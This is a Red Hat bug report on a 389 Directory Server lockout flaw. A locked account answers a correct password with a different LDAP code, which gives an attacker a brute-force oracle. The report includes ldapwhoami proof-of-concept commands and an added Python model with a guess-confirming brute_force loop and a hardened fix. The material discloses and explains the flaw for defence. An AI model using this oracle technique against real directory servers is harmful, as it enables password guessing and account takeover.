Bug 1476958 - Locked account provides different return code if password is correct
Status: CLOSED DUPLICATE of bug 1478045
Product: Red Hat Enterprise Linux 7
Classification: Red Hat
Component: 389-ds-base
Version: 7.3
Priority: medium
Severity: unspecified
Target Milestone: rc
Assigned To: mreynolds
QA Contact: Viktor Ashirov
Blocks: CVE-2017-7551

Reported: 2017-07-31 20:05 EDT by wibrown@redhat.com
Modified: 2017-08-24 13:22 EDT

Last Closed: 2017-08-24 13:22:26 EDT


Attachments: None
Description wibrown@redhat.com 2017-07-31 20:05:34 EDT
This bug is created as a clone of upstream ticket:
https://pagure.io/389-ds-base/issue/49336

The directory server password lockout policy prevents binds from operating once a threshold of failed passwords has been met. During this lockout, if you bind with a successful password, a different error code is returned. This means that an attacker has no rate limit or penalty during an account lock, and can continue to attempt passwords via brute force.

Proof of concept:

```
ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w password
dn: uid=testuser,dc=example,dc=com
```

Bind with invalid credentials a number of times to trigger the lockout:

```
ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w passworda
ldap_bind: Invalid credentials (49)
```

Then bind with valid credentials while the lockout is in effect:

```
ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w password
ldap_bind: Constraint violation (19)
        additional info: Exceed password retry limit. Please try later.
```

Workaround: Use PBKDF2_SHA256 to delay the rate at which an attacker can attempt binds. Limit the number of threads allowed to anonymous.
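The oracle the report describes, modelled in Python as an added example. This is not 389-ds-base code and it does not describe the upstream patch: it is a small in-memory bind handler with a lockout counter, built to show why a result code that depends on password correctness while the account is locked leaves the attacker with a working brute-force oracle. The account DN and the candidate passwords are constructed test data; the "hardened" handler is this example's own choice of fix.

```python
"""Model of the lockout oracle from the report (added example, not
389-ds-base code).  Result codes are the LDAP ones seen in the PoC:
49 = invalidCredentials, 19 = constraintViolation.  Lockout is permanent
here (no lockout duration) to keep the model small."""
import hashlib
import hmac
import os

SUCCESS = 0
CONSTRAINT_VIOLATION = 19
INVALID_CREDENTIALS = 49


class Account:
    """One entry: salted PBKDF2-SHA256 hash plus the server-side failure counter."""

    def __init__(self, dn, password, max_failures=3):
        self.dn = dn
        self.salt = os.urandom(16)
        self.pw_hash = self._hash(password)
        self.failures = 0
        self.max_failures = max_failures

    def _hash(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 10_000)

    def check(self, password):
        return hmac.compare_digest(self._hash(password), self.pw_hash)

    def locked(self):
        return self.failures >= self.max_failures


def bind_vulnerable(acct, password):
    """Behaviour from the report: the password is verified first, so on a
    locked account a correct password yields 19 and a wrong one yields 49."""
    if not acct.check(password):
        acct.failures += 1
        return INVALID_CREDENTIALS
    if acct.locked():
        return CONSTRAINT_VIOLATION  # only reachable with the right password
    acct.failures = 0
    return SUCCESS


def bind_hardened(acct, password):
    """This example's own fix (not the upstream patch): a locked account is
    answered before the password is examined, so the code says nothing
    about the guess."""
    if acct.locked():
        return CONSTRAINT_VIOLATION
    if not acct.check(password):
        acct.failures += 1
        return INVALID_CREDENTIALS
    acct.failures = 0
    return SUCCESS


def lock_out(bind_fn, acct, wrong="passworda"):
    """Trigger the lockout the way the report does: repeat a wrong password."""
    while not acct.locked():
        bind_fn(acct, wrong)


def brute_force(bind_fn, acct, candidates):
    """Attacker loop against an already locked account.  A guess is confirmed
    when the server answers it differently from a probe that is certainly
    wrong.  Returns the confirmed password or None."""
    probe = os.urandom(12).hex()  # 24 hex chars, not in any wordlist
    for guess in candidates:
        code_guess = bind_fn(acct, guess)
        code_probe = bind_fn(acct, probe)
        if code_guess == SUCCESS or code_guess != code_probe:
            return guess
    return None


def demo(bind_fn, password="password",
         wordlist=("letmein", "passworda", "password", "hunter2")):
    """Lock a constructed test account, then attack it.  Returns (code for a
    wrong password while locked, code for the right password while locked,
    password recovered by brute force or None)."""
    acct = Account("uid=testuser,dc=example,dc=com", password)  # constructed entry
    lock_out(bind_fn, acct)
    wrong_code = bind_fn(acct, "passworda")
    right_code = bind_fn(acct, password)
    return wrong_code, right_code, brute_force(bind_fn, acct, wordlist)


if __name__ == "__main__":
    print("vulnerable:", demo(bind_vulnerable))  # (49, 19, 'password')
    print("hardened:  ", demo(bind_hardened))    # (19, 19, None)
```

The attacker never needs a successful bind: the only signal used is that the locked account answers the right password with a code it does not give to wrong ones, which is exactly the 19 versus 49 split in the PoC above. The hardened handler removes that split by deciding on lockout state before touching the password; a real server would also clear the lock after the configured duration, which this model omits. The PBKDF2 cost in the model is the same lever as the PBKDF2_SHA256 workaround: it slows each probe but does not close the oracle.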
Comment 3 Nathan Kinder 2017-08-24 13:22:26 EDT

*** This bug has been marked as a duplicate of bug 1478045 ***
